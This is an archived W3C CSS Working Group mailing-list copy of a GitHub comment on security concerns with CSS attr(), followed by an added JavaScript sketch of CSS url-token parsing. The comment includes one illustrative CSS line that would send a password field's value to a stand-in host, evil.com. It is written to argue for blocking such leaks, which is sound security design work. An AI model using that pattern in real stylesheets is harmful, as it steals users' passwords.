Re: [csswg-drafts] [css-values] Security concerns regarding attr() (#5092)

So I think #5079 should be resolved how Anne suggests, which would conveniently also remove the ability to exfiltrate arbitrary data to an arbitrary origin via `attr(foo url)`.  I think that, for now, brings us back to the existing status quo, and so should unblock the new `attr()` from shipping. (You can't write `url(attr(...))` at all (it'll parse as a bad-url-token and make the property invalid, see [the Syntax spec](https://drafts.csswg.org/css-syntax/#consume-url-token)), so there's no concern there for any value currently.)

However, when we introduce a string concatenation function, and a `url()` variant that can *take* functions, then `input[type=password]{background-image: fetch(concat("https://evil.com/data-stealing?pw=", attr(value string))); }` will work and accomplish the same thing.  And this *exact* use-case (not pw stealing; concatenating an attr and a url fragment to select an image) was brought up as one of the justifications for *adding* string concatenation, so this is unfortunate.

I think that, separately, we should pursue what Mike West suggested in the ItS thread, and block certain sensitive attributes from being visible to CSS at all - `nonce`, the `value` of any form input, etc.  I'll open a different bug for that.

-- 
GitHub Notification of comment by tabatkins
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/5092#issuecomment-636092158 using your GitHub account

Received on Friday, 29 May 2020 17:27:11 UTC
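
The parsing behaviour mentioned in the comment above (`url(attr(...))` becoming a bad-url-token), as an added example that is not part of the original message or of any browser's code: a simplified JavaScript version of the Syntax spec's "consume a url token" step. The function names are hypothetical, and escapes are assumed to cover only the single code point after the backslash (hex escapes are not decoded).

```javascript
// Added example: simplified "consume a url token" (CSS Syntax).
// Input is the stylesheet text that follows "url(".
// Assumption: an escape is "\" plus one code point; hex escapes are not decoded.
const isWs = (c) => c === " " || c === "\t" || c === "\n";
const isNonPrintable = (c) => {
  const n = c.codePointAt(0);
  return n <= 0x08 || n === 0x0b || (n >= 0x0e && n <= 0x1f) || n === 0x7f;
};

// "Consume the remnants of a bad url": skip to the first ")" or end of input.
function consumeBadUrlRemnants(s, i) {
  while (i < s.length) {
    const c = s[i++];
    if (c === ")") break;
    if (c === "\\" && i < s.length && s[i] !== "\n") i++; // skip escaped code point
  }
  return i;
}

function consumeUrlToken(s) {
  let i = 0;
  let value = "";
  const bad = () => ({ type: "bad-url", end: consumeBadUrlRemnants(s, i) });
  while (i < s.length && isWs(s[i])) i++;
  // url("...") is tokenized as a function token with a string argument instead.
  if (s[i] === '"' || s[i] === "'") return { type: "function", end: i };
  while (i < s.length) {
    const c = s[i++];
    if (c === ")") return { type: "url", value, end: i };
    if (isWs(c)) {
      while (i < s.length && isWs(s[i])) i++;
      if (i >= s.length) return { type: "url", value, end: i };
      if (s[i] === ")") return { type: "url", value, end: i + 1 };
      return bad(); // whitespace in the middle of an unquoted URL
    }
    // "(" is what turns url(attr(...)) into a bad-url-token.
    if (c === '"' || c === "'" || c === "(" || isNonPrintable(c)) return bad();
    if (c === "\\") {
      if (s[i] === "\n") return bad(); // backslash-newline is not a valid escape
      value += i < s.length ? s[i++] : "\uFFFD";
      continue;
    }
    value += c;
  }
  return { type: "url", value, end: i }; // end of input: parse error, still a url-token
}
```

For the constructed input `attr(data-x))`, the remnants step stops at the first `)`, so the second `)` is left in the stream as a stray token.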